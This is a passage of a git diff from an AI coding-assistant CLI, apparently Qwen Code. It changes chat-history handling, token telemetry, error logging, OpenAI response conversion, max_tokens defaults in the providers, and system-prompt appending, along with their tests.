+import { getErrorStatus } from '../utils/errors.js'; import { createDebugLogger } from '../utils/debugLogger.js'; import { parseAndFormatApiError } from '../utils/errorParsing.js'; import { isRateLimitError, type RetryInfo } from '../utils/rateLimit.js'; @@ -33,6 +34,7 @@ import { ContentRetryEvent, ContentRetryFailureEvent, } from '../telemetry/types.js'; +import type { UiTelemetryService } from '../telemetry/uiTelemetry.js'; import { uiTelemetryService } from '../telemetry/uiTelemetry.js'; const debugLogger = createDebugLogger('QWEN_CODE_CHAT'); @@ -234,12 +236,16 @@ export class GeminiChat { * @param history - Optional initial conversation history. * @param chatRecordingService - Optional recording service. If provided, chat * messages will be recorded. + * @param telemetryService - Optional UI telemetry service. When provided, + * prompt token counts are reported on each API response. Pass `undefined` + * for sub-agent chats to avoid overwriting the main agent's context usage. */ constructor( private readonly config: Config, private readonly generationConfig: GenerateContentConfig = {}, private history: Content[] = [], private readonly chatRecordingService?: ChatRecordingService, + private readonly telemetryService?: UiTelemetryService, ) { validateHistory(history); } @@ -571,6 +577,20 @@ export class GeminiChat { .filter((content) => content.parts && content.parts.length > 0); } + /** + * Pop all orphaned trailing user entries from chat history. + * In a valid conversation the last entry is always a model response; + * any trailing user entries are leftovers from a request that failed. + */ + stripOrphanedUserEntriesFromHistory(): void { + while ( + this.history.length > 0 && + this.history[this.history.length - 1]!.role === 'user' + ) { + this.history.pop(); + } + } + setTools(tools: Tool[]): void { this.generationConfig.tools = tools; } @@ -635,10 +655,21 @@ export class GeminiChat { // Collect token usage for consolidated recording if (chunk.usageMetadata) { usageMetadata = chunk.usageMetadata; + // Use || instead of ?? so that totalTokenCount=0 falls back to promptTokenCount. + // Some providers omit total_tokens or return 0 in streaming usage chunks. const lastPromptTokenCount = - usageMetadata.totalTokenCount ?? usageMetadata.promptTokenCount; + usageMetadata.totalTokenCount || usageMetadata.promptTokenCount; if (lastPromptTokenCount) { - uiTelemetryService.setLastPromptTokenCount(lastPromptTokenCount); + (this.telemetryService ?? uiTelemetryService).setLastPromptTokenCount( + lastPromptTokenCount, + ); + } + if (usageMetadata.cachedContentTokenCount) { + ( + this.telemetryService ?? uiTelemetryService + ).setLastCachedContentTokenCount( + usageMetadata.cachedContentTokenCount, + ); } } @@ -690,6 +721,8 @@ export class GeminiChat { // Record assistant turn with raw Content and metadata if (thoughtContentPart || contentText || hasToolCall || usageMetadata) { + const contextWindowSize = + this.config.getContentGeneratorConfig()?.contextWindowSize; this.chatRecordingService?.recordAssistantTurn({ model, message: [ @@ -702,6 +735,7 @@ export class GeminiChat { : []), ], tokens: usageMetadata, + contextWindowSize, }); } diff --git a/packages/core/src/core/loggingContentGenerator/loggingContentGenerator.test.ts b/packages/core/src/core/loggingContentGenerator/loggingContentGenerator.test.ts index 156b75a01..06be16ea5 100644 --- a/packages/core/src/core/loggingContentGenerator/loggingContentGenerator.test.ts +++ b/packages/core/src/core/loggingContentGenerator/loggingContentGenerator.test.ts @@ -35,6 +35,8 @@ vi.mock('../../utils/openaiLogger.js', () => ({ })), })); +const realConvertGeminiRequestToOpenAI = + OpenAIContentConverter.prototype.convertGeminiRequestToOpenAI; const convertGeminiRequestToOpenAISpy = vi .spyOn(OpenAIContentConverter.prototype, 'convertGeminiRequestToOpenAI') .mockReturnValue([{ role: 'user', content: 'converted' }]); @@ -50,6 +52,10 @@ const convertGeminiResponseToOpenAISpy = vi model: 'test-model', choices: [], } as OpenAI.Chat.ChatCompletion); +const setModalitiesSpy = vi.spyOn( + OpenAIContentConverter.prototype, + 'setModalities', +); const createConfig = (overrides: Record = {}): Config => { const configContent = { @@ -109,6 +115,7 @@ describe('LoggingContentGenerator', () => { convertGeminiRequestToOpenAISpy.mockClear(); convertGeminiToolsToOpenAISpy.mockClear(); convertGeminiResponseToOpenAISpy.mockClear(); + setModalitiesSpy.mockClear(); }); it('logs request/response, normalizes thought parts, and logs OpenAI interaction', async () => { @@ -225,7 +232,7 @@ describe('LoggingContentGenerator', () => { it('logs errors with status code and request id, then rethrows', async () => { const error = Object.assign(new Error('boom'), { - code: 429, + status: 429, request_id: 'req-99', type: 'rate_limit', }); @@ -394,4 +401,76 @@ describe('LoggingContentGenerator', () => { ?.value as { logInteraction: ReturnType }; expect(openaiLoggerInstance.logInteraction).toHaveBeenCalledTimes(1); }); + + it('uses generator modalities when converting logged OpenAI requests', async () => { + convertGeminiRequestToOpenAISpy.mockImplementationOnce(function ( + this: OpenAIContentConverter, + request, + options, + ) { + return realConvertGeminiRequestToOpenAI.call(this, request, options); + }); + + const wrapped = createWrappedGenerator( + vi + .fn() + .mockResolvedValue( + createResponse('resp-5', 'test-model', [{ text: 'ok' }]), + ), + vi.fn(), + ); + const generatorConfig = { + model: 'test-model', + authType: AuthType.USE_OPENAI, + enableOpenAILogging: true, + modalities: { image: true }, + }; + const generator = new LoggingContentGenerator( + wrapped, + createConfig(), + generatorConfig, + ); + + const request = { + model: 'test-model', + contents: [ + { + role: 'user', + parts: [ + { text: 'Inspect this' }, + { + inlineData: { + mimeType: 'image/png', + data: 'img-data', + displayName: 'diagram.png', + }, + }, + ], + }, + ], + } as unknown as GenerateContentParameters; + + await generator.generateContent(request, 'prompt-5'); + + expect(setModalitiesSpy).toHaveBeenCalledWith({ image: true }); + + const openaiLoggerInstance = vi.mocked(OpenAILogger).mock.results[0] + ?.value as { logInteraction: ReturnType }; + const [openaiRequest] = openaiLoggerInstance.logInteraction.mock + .calls[0] as [OpenAI.Chat.ChatCompletionCreateParams]; + expect(openaiRequest.messages).toEqual([ + { + role: 'user', + content: [ + { type: 'text', text: 'Inspect this' }, + { + type: 'image_url', + image_url: { + url: 'data:image/png;base64,img-data', + }, + }, + ], + }, + ]); + }); }); diff --git a/packages/core/src/core/loggingContentGenerator/loggingContentGenerator.ts b/packages/core/src/core/loggingContentGenerator/loggingContentGenerator.ts index 1a51846c3..61fc885e9 100644 --- a/packages/core/src/core/loggingContentGenerator/loggingContentGenerator.ts +++ b/packages/core/src/core/loggingContentGenerator/loggingContentGenerator.ts @@ -34,14 +34,15 @@ import { import type { ContentGenerator, ContentGeneratorConfig, + InputModalities, } from '../contentGenerator.js'; -import { isStructuredError } from '../../utils/quotaErrorDetection.js'; import { OpenAIContentConverter } from '../openaiContentGenerator/converter.js'; import { OpenAILogger } from '../../utils/openaiLogger.js'; - -interface StructuredError { - status: number; -} +import { + getErrorMessage, + getErrorStatus, + getErrorType, +} from '../../utils/errors.js'; /** * A decorator that wraps a ContentGenerator to add logging to API calls. @@ -49,12 +50,15 @@ interface StructuredError { export class LoggingContentGenerator implements ContentGenerator { private openaiLogger?: OpenAILogger; private schemaCompliance?: 'auto' | 'openapi_30'; + private modalities?: InputModalities; constructor( private readonly wrapped: ContentGenerator, private readonly config: Config, generatorConfig: ContentGeneratorConfig, ) { + this.modalities = generatorConfig.modalities; + // Extract fields needed for initialization from passed config // (config.getContentGeneratorConfig() may not be available yet during refreshAuth) if (generatorConfig.enableOpenAILogging) { @@ -108,33 +112,26 @@ export class LoggingContentGenerator implements ContentGenerator { model: string, prompt_id: string, ): void { - const errorMessage = error instanceof Error ? error.message : String(error); - const errorType = - (error as { type?: string })?.type || - (error instanceof Error ? error.name : 'unknown'); + const errorMessage = getErrorMessage(error); + const errorType = getErrorType(error); const errorResponseId = (error as { requestID?: string; request_id?: string })?.requestID || (error as { requestID?: string; request_id?: string })?.request_id || responseId; - const errorStatus = - (error as { code?: string | number; status?: number })?.code ?? - (error as { status?: number })?.status ?? - (isStructuredError(error) - ? (error as StructuredError).status - : undefined); + const errorStatus = getErrorStatus(error); logApiError( this.config, - new ApiErrorEvent( - errorResponseId, + new ApiErrorEvent({ + responseId: errorResponseId, model, - errorMessage, durationMs, - prompt_id, - this.config.getAuthType(), + promptId: prompt_id, + authType: this.config.getAuthType(), + errorMessage, errorType, - errorStatus, - ), + statusCode: errorStatus, + }), ); } @@ -247,6 +244,7 @@ export class LoggingContentGenerator implements ContentGenerator { request.model, this.schemaCompliance, ); + converter.setModalities(this.modalities ?? {}); const messages = converter.convertGeminiRequestToOpenAI(request, { cleanOrphanToolCalls: false, }); diff --git a/packages/core/src/core/nonInteractiveToolExecutor.test.ts b/packages/core/src/core/nonInteractiveToolExecutor.test.ts index 989b61c37..866370837 100644 --- a/packages/core/src/core/nonInteractiveToolExecutor.test.ts +++ b/packages/core/src/core/nonInteractiveToolExecutor.test.ts @@ -62,6 +62,16 @@ describe('executeToolCall', () => { getUseModelRouter: () => false, getGeminiClient: () => null, // No client needed for these tests getChatRecordingService: () => undefined, + getMessageBus: vi.fn().mockReturnValue(undefined), + getEnableHooks: vi.fn().mockReturnValue(false), + getHookSystem: vi.fn().mockReturnValue(undefined), + getDebugLogger: vi.fn().mockReturnValue({ + debug: vi.fn(), + info: vi.fn(), + warn: vi.fn(), + error: vi.fn(), + }), + isInteractive: vi.fn().mockReturnValue(false), } as unknown as Config; abortController = new AbortController(); @@ -94,7 +104,6 @@ describe('executeToolCall', () => { callId: 'call1', error: undefined, errorType: undefined, - outputFile: undefined, resultDisplay: 'Success!', contentLength: typeof toolResult.llmContent === 'string' @@ -299,7 +308,6 @@ describe('executeToolCall', () => { callId: 'call6', error: undefined, errorType: undefined, - outputFile: undefined, resultDisplay: 'Image processed', contentLength: undefined, responseParts: [ diff --git a/packages/core/src/core/openaiContentGenerator/converter.test.ts b/packages/core/src/core/openaiContentGenerator/converter.test.ts index 115d6dc0d..46e84e672 100644 --- a/packages/core/src/core/openaiContentGenerator/converter.test.ts +++ b/packages/core/src/core/openaiContentGenerator/converter.test.ts @@ -1014,6 +1014,20 @@ describe('OpenAIContentConverter', () => { }); }); + describe('convertOpenAIResponseToGemini', () => { + it('should handle empty choices array without crashing', () => { + const response = converter.convertOpenAIResponseToGemini({ + object: 'chat.completion', + id: 'chatcmpl-empty', + created: 123, + model: 'test-model', + choices: [], + } as unknown as OpenAI.Chat.ChatCompletion); + + expect(response.candidates).toEqual([]); + }); + }); + describe('OpenAI -> Gemini reasoning content', () => { it('should convert reasoning_content to a thought part for non-streaming responses', () => { const response = converter.convertOpenAIResponseToGemini({ diff --git a/packages/core/src/core/openaiContentGenerator/converter.ts b/packages/core/src/core/openaiContentGenerator/converter.ts index d90737d10..91d0b31fb 100644 --- a/packages/core/src/core/openaiContentGenerator/converter.ts +++ b/packages/core/src/core/openaiContentGenerator/converter.ts @@ -821,42 +821,60 @@ export class OpenAIContentConverter { convertOpenAIResponseToGemini( openaiResponse: OpenAI.Chat.ChatCompletion, ): GenerateContentResponse { - const choice = openaiResponse.choices[0]; + const choice = openaiResponse.choices?.[0]; const response = new GenerateContentResponse(); - const parts: Part[] = []; + if (choice) { + const parts: Part[] = []; - // Handle reasoning content (thoughts) - const reasoningText = - (choice.message as ExtendedCompletionMessage).reasoning_content ?? - (choice.message as ExtendedCompletionMessage).reasoning; - if (reasoningText) { - parts.push({ text: reasoningText, thought: true }); - } + // Handle reasoning content (thoughts) + const reasoningText = + (choice.message as ExtendedCompletionMessage).reasoning_content ?? + (choice.message as ExtendedCompletionMessage).reasoning; + if (reasoningText) { + parts.push({ text: reasoningText, thought: true }); + } - // Handle text content - if (choice.message.content) { - parts.push({ text: choice.message.content }); - } + // Handle text content + if (choice.message.content) { + parts.push({ text: choice.message.content }); + } - // Handle tool calls - if (choice.message.tool_calls) { - for (const toolCall of choice.message.tool_calls) { - if (toolCall.function) { - let args: Record = {}; - if (toolCall.function.arguments) { - args = safeJsonParse(toolCall.function.arguments, {}); + // Handle tool calls + if (choice.message.tool_calls) { + for (const toolCall of choice.message.tool_calls) { + if (toolCall.function) { + let args: Record = {}; + if (toolCall.function.arguments) { + args = safeJsonParse(toolCall.function.arguments, {}); + } + + parts.push({ + functionCall: { + id: toolCall.id, + name: toolCall.function.name, + args, + }, + }); } - - parts.push({ - functionCall: { - id: toolCall.id, - name: toolCall.function.name, - args, - }, - }); } } + + response.candidates = [ + { + content: { + parts, + role: 'model' as const, + }, + finishReason: this.mapOpenAIFinishReasonToGemini( + choice.finish_reason || 'stop', + ), + index: 0, + safetyRatings: [], + }, + ]; + } else { + response.candidates = []; } response.responseId = openaiResponse.id; @@ -864,20 +882,6 @@ export class OpenAIContentConverter { ? openaiResponse.created.toString() : new Date().getTime().toString(); - response.candidates = [ - { - content: { - parts, - role: 'model' as const, - }, - finishReason: this.mapOpenAIFinishReasonToGemini( - choice.finish_reason || 'stop', - ), - index: 0, - safetyRatings: [], - }, - ]; - response.modelVersion = this.model; response.promptFeedback = { safetyRatings: [] }; diff --git a/packages/core/src/core/openaiContentGenerator/pipeline.ts b/packages/core/src/core/openaiContentGenerator/pipeline.ts index 5c6cdc682..4e2d42bd8 100644 --- a/packages/core/src/core/openaiContentGenerator/pipeline.ts +++ b/packages/core/src/core/openaiContentGenerator/pipeline.ts @@ -255,9 +255,23 @@ export class ContentGenerationPipeline { .candidates?.[0]?.finishReason; if (isFinishChunk) { - // This is a finish reason chunk - collectedGeminiResponses.push(response); - setPendingFinish(response); + if (hasPendingFinish) { + // Duplicate finish chunk (e.g. from OpenRouter providers that send two + // finish_reason chunks for tool calls). The streaming tool call parser + // was already reset after the first finish chunk, so the second one + // carries no functionCall parts. Merge only usageMetadata and keep the + // candidates (including functionCall parts) from the first finish chunk. + const lastResponse = + collectedGeminiResponses[collectedGeminiResponses.length - 1]; + if (response.usageMetadata) { + lastResponse.usageMetadata = response.usageMetadata; + } + setPendingFinish(lastResponse); + } else { + // This is a finish reason chunk + collectedGeminiResponses.push(response); + setPendingFinish(response); + } return false; // Don't yield yet, wait for potential subsequent chunks to merge } else if (hasPendingFinish) { // We have a pending finish chunk, merge this chunk's data into it diff --git a/packages/core/src/core/openaiContentGenerator/provider/dashscope.test.ts b/packages/core/src/core/openaiContentGenerator/provider/dashscope.test.ts index e1ecb61b6..c64ee436d 100644 --- a/packages/core/src/core/openaiContentGenerator/provider/dashscope.test.ts +++ b/packages/core/src/core/openaiContentGenerator/provider/dashscope.test.ts @@ -789,7 +789,7 @@ describe('DashScopeOpenAICompatibleProvider', () => { expect(result.max_tokens).toBe(1000); // Should remain unchanged }); - it('should not add max_tokens when not present in request', () => { + it('should set conservative max_tokens default when not present in request', () => { const request: OpenAI.Chat.ChatCompletionCreateParams = { model: 'qwen3-max', messages: [{ role: 'user', content: 'Hello' }], @@ -798,31 +798,35 @@ describe('DashScopeOpenAICompatibleProvider', () => { const result = provider.buildRequest(request, 'test-prompt-id'); - expect(result.max_tokens).toBeUndefined(); // Should remain undefined + // Should set conservative default (min of model limit and DEFAULT_OUTPUT_TOKEN_LIMIT) + // qwen3-max has 64K output limit, so min(64K, 32K) = 32K + expect(result.max_tokens).toBe(32000); }); - it('should handle null max_tokens parameter', () => { + it('should set conservative max_tokens when null is provided', () => { const request: OpenAI.Chat.ChatCompletionCreateParams = { model: 'qwen3-max', messages: [{ role: 'user', content: 'Hello' }], - max_tokens: null, + max_tokens: null as unknown as undefined, }; const result = provider.buildRequest(request, 'test-prompt-id'); - expect(result.max_tokens).toBeNull(); // Should remain null + // null is treated as not configured, so set conservative default + expect(result.max_tokens).toBe(32000); }); - it('should use default output limit for unknown models', () => { + it('should respect user max_tokens for unknown models', () => { const request: OpenAI.Chat.ChatCompletionCreateParams = { model: 'unknown-model', messages: [{ role: 'user', content: 'Hello' }], - max_tokens: 10000, // Exceeds the default limit + max_tokens: 40000, // User explicitly sets 40K }; const result = provider.buildRequest(request, 'test-prompt-id'); - expect(result.max_tokens).toBe(8192); // Should be limited to default output limit (8K) + // Unknown models: respect user's configuration (backend may support it) + expect(result.max_tokens).toBe(40000); }); it('should preserve other request parameters when limiting max_tokens', () => { diff --git a/packages/core/src/core/openaiContentGenerator/provider/dashscope.ts b/packages/core/src/core/openaiContentGenerator/provider/dashscope.ts index a889401cf..a94ad0be3 100644 --- a/packages/core/src/core/openaiContentGenerator/provider/dashscope.ts +++ b/packages/core/src/core/openaiContentGenerator/provider/dashscope.ts @@ -9,27 +9,20 @@ import { DEFAULT_DASHSCOPE_BASE_URL, } from '../constants.js'; import type { - OpenAICompatibleProvider, DashScopeRequestMetadata, ChatCompletionContentPartTextWithCache, ChatCompletionContentPartWithCache, ChatCompletionToolWithCache, } from './types.js'; import { buildRuntimeFetchOptions } from '../../../utils/runtimeFetchOptions.js'; -import { tokenLimit } from '../../tokenLimits.js'; - -export class DashScopeOpenAICompatibleProvider - implements OpenAICompatibleProvider -{ - private contentGeneratorConfig: ContentGeneratorConfig; - private cliConfig: Config; +import { DefaultOpenAICompatibleProvider } from './default.js'; +export class DashScopeOpenAICompatibleProvider extends DefaultOpenAICompatibleProvider { constructor( contentGeneratorConfig: ContentGeneratorConfig, cliConfig: Config, ) { - this.cliConfig = cliConfig; - this.contentGeneratorConfig = contentGeneratorConfig; + super(contentGeneratorConfig, cliConfig); } static isDashScopeProvider( @@ -44,7 +37,7 @@ export class DashScopeOpenAICompatibleProvider return /([\w-]+\.)?dashscope(-intl)?\.aliyuncs\.com/i.test(baseUrl); } - buildHeaders(): Record { + override buildHeaders(): Record { const version = this.cliConfig.getCliVersion() || 'unknown'; const userAgent = `QwenCode/${version} (${process.platform}; ${process.arch})`; const { authType, customHeaders } = this.contentGeneratorConfig; @@ -60,7 +53,7 @@ export class DashScopeOpenAICompatibleProvider : defaultHeaders; } - buildClient(): OpenAI { + override buildClient(): OpenAI { const { apiKey, baseUrl = DEFAULT_DASHSCOPE_BASE_URL, @@ -98,7 +91,7 @@ export class DashScopeOpenAICompatibleProvider * @param userPromptId - Unique identifier for the user prompt for session tracking * @returns Configured request with DashScope-specific parameters applied */ - buildRequest( + override buildRequest( request: OpenAI.Chat.ChatCompletionCreateParams, userPromptId: string, ): OpenAI.Chat.ChatCompletionCreateParams { @@ -116,8 +109,9 @@ export class DashScopeOpenAICompatibleProvider tools = updatedTools; } - // Apply output token limits based on model capabilities - // This ensures max_tokens doesn't exceed the model's maximum output limit + // Apply output token limits using parent class logic + // Uses conservative default (min of model limit and DEFAULT_OUTPUT_TOKEN_LIMIT) + // to preserve input quota when user hasn't explicitly configured max_tokens const requestWithTokenLimits = this.applyOutputTokenLimit(request); const extraBody = this.contentGeneratorConfig.extra_body; @@ -155,7 +149,7 @@ export class DashScopeOpenAICompatibleProvider }; } - getDefaultGenerationConfig(): GenerateContentConfig { + override getDefaultGenerationConfig(): GenerateContentConfig { return { temperature: 0.3, }; @@ -316,41 +310,6 @@ export class DashScopeOpenAICompatibleProvider return false; } - /** - * Apply output token limit to a request's max_tokens parameter. - * - * Ensures that existing max_tokens parameters don't exceed the model's maximum output - * token limit. Only modifies max_tokens when already present in the request. - * - * @param request - The chat completion request parameters - * @returns The request with max_tokens adjusted to respect the model's limits (if present) - */ - private applyOutputTokenLimit< - T extends { max_tokens?: number | null; model: string }, - >(request: T): T { - const currentMaxTokens = request.max_tokens; - - // Only process if max_tokens is already present in the request - if (currentMaxTokens === undefined || currentMaxTokens === null) { - return request; // No max_tokens parameter, return unchanged - } - - // Dynamically calculate output token limit using tokenLimit function - // This ensures we always use the latest model-specific limits without relying on user configuration - const modelLimit = tokenLimit(request.model, 'output'); - - // If max_tokens exceeds the model limit, cap it to the model's limit - if (currentMaxTokens > modelLimit) { - return { - ...request, - max_tokens: modelLimit, - }; - } - - // If max_tokens is within the limit, return the request unchanged - return request; - } - /** * Check if cache control should be disabled based on configuration. * diff --git a/packages/core/src/core/openaiContentGenerator/provider/default.test.ts b/packages/core/src/core/openaiContentGenerator/provider/default.test.ts index cc227b464..ce46a3621 100644 --- a/packages/core/src/core/openaiContentGenerator/provider/default.test.ts +++ b/packages/core/src/core/openaiContentGenerator/provider/default.test.ts @@ -193,6 +193,76 @@ describe('DefaultOpenAICompatibleProvider', () => { expect(result).not.toBe(originalRequest); // Should be a new object }); + it('should set conservative max_tokens default when not configured', () => { + const requestWithoutMaxTokens: OpenAI.Chat.ChatCompletionCreateParams = { + model: 'gpt-4', + messages: [{ role: 'user', content: 'Hello' }], + }; + + const result = provider.buildRequest( + requestWithoutMaxTokens, + 'prompt-id', + ); + + // Should set conservative default (min of model limit and DEFAULT_OUTPUT_TOKEN_LIMIT) + // GPT-4 has 16K output limit, so min(16K, 32K) = 16K + expect(result.max_tokens).toBe(16384); + }); + + it('should respect user max_tokens for unknown models (deployment aliases, self-hosted)', () => { + // Unknown models: user config is respected entirely (backend may support larger limits) + const request: OpenAI.Chat.ChatCompletionCreateParams = { + model: 'unknown-model', + messages: [{ role: 'user', content: 'Hello' }], + max_tokens: 100000, + }; + + const result = provider.buildRequest(request, 'prompt-id'); + + // User's 100K setting is preserved for unknown models + expect(result.max_tokens).toBe(100000); + }); + + it('should use conservative default for unknown models when max_tokens not configured', () => { + // Unknown models without user config: use DEFAULT_OUTPUT_TOKEN_LIMIT + const request: OpenAI.Chat.ChatCompletionCreateParams = { + model: 'custom-deployment-alias', + messages: [{ role: 'user', content: 'Hello' }], + }; + + const result = provider.buildRequest(request, 'prompt-id'); + + // Uses conservative default (32K) + expect(result.max_tokens).toBe(32000); + }); + + it('should cap max_tokens for known models to avoid API errors', () => { + // Known models (GPT-4): user config is capped at model limit + const request: OpenAI.Chat.ChatCompletionCreateParams = { + model: 'gpt-4', + messages: [{ role: 'user', content: 'Hello' }], + max_tokens: 100000, // Exceeds GPT-4's 16K limit + }; + + const result = provider.buildRequest(request, 'prompt-id'); + + // Capped to GPT-4's output limit (16K) + expect(result.max_tokens).toBe(16384); + }); + + it('should treat null max_tokens as not configured', () => { + const request: OpenAI.Chat.ChatCompletionCreateParams = { + model: 'gpt-4', + messages: [{ role: 'user', content: 'Hello' }], + max_tokens: null as unknown as undefined, + }; + + const result = provider.buildRequest(request, 'prompt-id'); + + // GPT-4 has 16K output limit, so conservative default is still 16K + expect(result.max_tokens).toBe(16384); + }); + it('should preserve all sampling parameters', () => { const originalRequest: OpenAI.Chat.ChatCompletionCreateParams = { model: 'gpt-3.5-turbo', @@ -230,7 +300,10 @@ describe('DefaultOpenAICompatibleProvider', () => { const result = provider.buildRequest(minimalRequest, 'prompt-id'); - expect(result).toEqual(minimalRequest); + // Should set conservative max_tokens default + expect(result.model).toBe('gpt-4'); + expect(result.messages).toEqual(minimalRequest.messages); + expect(result.max_tokens).toBe(16384); // GPT-4 has 16K limit, min(16K, 32K) = 16K }); it('should handle streaming requests', () => { @@ -242,8 +315,11 @@ describe('DefaultOpenAICompatibleProvider', () => { const result = provider.buildRequest(streamingRequest, 'prompt-id'); - expect(result).toEqual(streamingRequest); + // Should set conservative max_tokens default while preserving stream + expect(result.model).toBe('gpt-4'); + expect(result.messages).toEqual(streamingRequest.messages); expect(result.stream).toBe(true); + expect(result.max_tokens).toBe(16384); // GPT-4 has 16K limit, min(16K, 32K) = 16K }); it('should not modify the original request object', () => { @@ -287,6 +363,7 @@ describe('DefaultOpenAICompatibleProvider', () => { expect(result).toEqual({ ...originalRequest, + max_tokens: 16384, // GPT-4 has 16K limit, min(16K, 32K) = 16K custom_param: 'custom_value', nested: { key: 'value' }, }); @@ -301,7 +378,11 @@ describe('DefaultOpenAICompatibleProvider', () => { const result = provider.buildRequest(originalRequest, 'prompt-id'); - expect(result).toEqual(originalRequest); + // Should preserve original params and set conservative max_tokens default + expect(result.model).toBe('gpt-4'); + expect(result.messages).toEqual(originalRequest.messages); + expect(result.temperature).toBe(0.7); + expect(result.max_tokens).toBe(16384); // GPT-4 has 16K limit, min(16K, 32K) = 16K expect(result).not.toHaveProperty('custom_param'); }); }); diff --git a/packages/core/src/core/openaiContentGenerator/provider/default.ts b/packages/core/src/core/openaiContentGenerator/provider/default.ts index 783c962d1..ec7f6946a 100644 --- a/packages/core/src/core/openaiContentGenerator/provider/default.ts +++ b/packages/core/src/core/openaiContentGenerator/provider/default.ts @@ -5,6 +5,11 @@ import type { ContentGeneratorConfig } from '../../contentGenerator.js'; import { DEFAULT_TIMEOUT, DEFAULT_MAX_RETRIES } from '../constants.js'; import type { OpenAICompatibleProvider } from './types.js'; import { buildRuntimeFetchOptions } from '../../../utils/runtimeFetchOptions.js'; +import { + tokenLimit, + DEFAULT_OUTPUT_TOKEN_LIMIT, + hasExplicitOutputLimit, +} from '../../tokenLimits.js'; /** * Default provider for standard OpenAI-compatible APIs @@ -65,9 +70,13 @@ export class DefaultOpenAICompatibleProvider _userPromptId: string, ): OpenAI.Chat.ChatCompletionCreateParams { const extraBody = this.contentGeneratorConfig.extra_body; - // Default provider doesn't need special enhancements, just pass through all parameters + + // Apply output token limits to ensure max_tokens is set appropriately + // This prevents occupying too much context window with output reservation + const requestWithTokenLimits = this.applyOutputTokenLimit(request); + return { - ...request, // Preserve all original parameters including sampling params + ...requestWithTokenLimits, ...(extraBody ? extraBody : {}), }; } @@ -75,4 +84,70 @@ export class DefaultOpenAICompatibleProvider getDefaultGenerationConfig(): GenerateContentConfig { return {}; } + + /** + * Apply output token limit to a request's max_tokens parameter. + * + * Purpose: + * Some APIs (e.g., OpenAI-compatible) default to a very small max_tokens value, + * which can cause responses to be truncated mid-output. This function ensures + * a reasonable default is set while respecting user configuration. + * + * Logic: + * 1. If user explicitly configured max_tokens: + * - For known models (in OUTPUT_PATTERNS): use the user's value, but cap at + * model's max output limit to avoid API errors + * (input + max_output > contextWindowSize would cause 400 errors on some APIs) + * - For unknown models (deployment aliases, self-hosted): respect user's + * configured value entirely (backend may support larger limits) + * 2. If user didn't configure max_tokens: + * - Use min(modelLimit, DEFAULT_OUTPUT_TOKEN_LIMIT) + * - This provides a conservative default (32K) that avoids truncating output + * while preserving input quota (not occupying too much context window) + * 3. If model has no specific limit (tokenLimit returns default): + * - Still apply DEFAULT_OUTPUT_TOKEN_LIMIT as safeguard + * + * Examples: + * - User sets 4K, known model limit 64K → uses 4K (respects user preference) + * - User sets 100K, known model limit 64K → uses 64K (capped to avoid API error) + * - User sets 100K, unknown model → uses 100K (respects user, backend may support it) + * - User not set, model limit 64K → uses 32K (conservative default) + * - User not set, model limit 8K → uses 8K (model limit is lower) + * + * @param request - The chat completion request parameters + * @returns The request with max_tokens adjusted according to the logic + */ + protected applyOutputTokenLimit< + T extends { max_tokens?: number | null; model: string }, + >(request: T): T { + const userMaxTokens = request.max_tokens; + + // Get model-specific output limit and check if model is known + const modelLimit = tokenLimit(request.model, 'output'); + const isKnownModel = hasExplicitOutputLimit(request.model); + + // Determine the effective max_tokens + let effectiveMaxTokens: number; + + if (userMaxTokens !== undefined && userMaxTokens !== null) { + // User explicitly configured max_tokens + if (isKnownModel) { + // Known model: respect user config but cap at model limit to avoid API errors + effectiveMaxTokens = Math.min(userMaxTokens, modelLimit); + } else { + // Unknown model (deployment aliases, self-hosted): respect user's value + // The backend may support larger limits than our default + effectiveMaxTokens = userMaxTokens; + } + } else { + // User didn't configure, use conservative default: + // min(model-specific limit, DEFAULT_OUTPUT_TOKEN_LIMIT) + effectiveMaxTokens = Math.min(modelLimit, DEFAULT_OUTPUT_TOKEN_LIMIT); + } + + return { + ...request, + max_tokens: effectiveMaxTokens, + }; + } } diff --git a/packages/core/src/core/prompts.test.ts b/packages/core/src/core/prompts.test.ts index 176efeb60..b0947e98f 100644 --- a/packages/core/src/core/prompts.test.ts +++ b/packages/core/src/core/prompts.test.ts @@ -80,6 +80,35 @@ describe('Core System Prompt (prompts.ts)', () => { expect(prompt).toMatchSnapshot(); // Snapshot the combined prompt }); + it('should append extra system prompt instructions after user memory when provided', () => { + vi.stubEnv('SANDBOX', undefined); + const memory = 'Remember the project conventions.'; + const appendInstruction = 'Always answer in exactly one sentence.'; + const prompt = getCoreSystemPrompt(memory, undefined, appendInstruction); + + expect(prompt).toContain(`\n\n---\n\n${memory}`); + expect(prompt).toContain(`\n\n---\n\n${appendInstruction}`); + expect(prompt.indexOf(memory)).toBeLessThan( + prompt.indexOf(appendInstruction), + ); + }); + + it('should append extra instructions after a custom system prompt and user memory', () => { + const customInstruction = 'You are a release manager.'; + const userMemory = 'The repo uses pnpm.'; + const appendInstruction = 'Only report blocking issues.'; + + const result = getCustomSystemPrompt( + customInstruction, + userMemory, + appendInstruction, + ); + + expect(result).toBe( + [customInstruction, userMemory, appendInstruction].join('\n\n---\n\n'), + ); + }); + it('should include sandbox-specific instructions when SANDBOX env var is set', () => { vi.stubEnv('SANDBOX', 'true'); // Generic sandbox value const prompt = getCoreSystemPrompt(); diff --git a/packages/core/src/core/prompts.ts b/packages/core/src/core/prompts.ts index bdf4c6dc1..b2799b79b 100644 --- a/packages/core/src/core/prompts.ts +++ b/packages/core/src/core/prompts.ts @@ -72,11 +72,13 @@ export function resolvePathFromEnv(envVar?: string): { * * @param customInstruction - Custom system instruction (ContentUnion from @google/genai) * @param userMemory - User memory to append - * @returns Processed custom system instruction with user memory appended + * @param appendInstruction - Extra instructions to append after user memory + * @returns Processed custom system instruction with user memory and extra append instructions applied */ export function getCustomSystemPrompt( customInstruction: GenerateContentConfig['systemInstruction'], userMemory?: string, + appendInstruction?: string, ): string { // Extract text from custom instruction let instructionText = ''; @@ -100,17 +102,20 @@ export function getCustomSystemPrompt( } // Append user memory using the same pattern as getCoreSystemPrompt - const memorySuffix = - userMemory && userMemory.trim().length > 0 - ? `\n\n---\n\n${userMemory.trim()}` - : ''; + const memorySuffix = buildSystemPromptSuffix(userMemory); - return `${instructionText}${memorySuffix}`; + return `${instructionText}${memorySuffix}${buildSystemPromptSuffix(appendInstruction)}`; +} + +function buildSystemPromptSuffix(text?: string): string { + const trimmed = text?.trim(); + return trimmed ? `\n\n---\n\n${trimmed}` : ''; } export function getCoreSystemPrompt( userMemory?: string, model?: string, + appendInstruction?: string, ): string { // if QWEN_SYSTEM_MD is set (and not 0|false), override system prompt from file // default path is .qwen/system.md but can be modified via custom path in QWEN_SYSTEM_MD @@ -338,10 